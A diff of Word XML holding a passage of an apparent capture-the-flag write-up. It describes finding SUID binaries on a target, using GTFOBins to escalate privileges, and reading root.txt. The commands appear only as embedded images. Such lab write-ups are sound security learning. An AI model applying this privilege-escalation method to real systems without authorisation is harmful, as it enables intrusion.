+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for several minutes (including investigation </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>for secret messages inside their content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I gave </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>up and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> moved to search for SUID binaries over the target’s machine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> using this command:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8045E3" wp14:editId="63060BC6">
+            <wp:extent cx="3505504" cy="140982"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="938792797" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="938792797" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3505504" cy="140982"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>I found this unusual binary:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1FF596" wp14:editId="2B1D7840">
+            <wp:extent cx="769687" cy="171465"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1035478604" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1035478604" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="769687" cy="171465"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After checking in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>GTFOBins</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I found that I can use this binary </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">escalate my privileges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">by </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+        <w:t>executing this exploit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F231126" wp14:editId="6F55A9F5">
+            <wp:extent cx="2267146" cy="502964"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1280715926" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1280715926" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2267146" cy="502964"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+        <w:t>And after short navigation, I found the root.txt file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> content inside the /root directory.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="he-IL"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
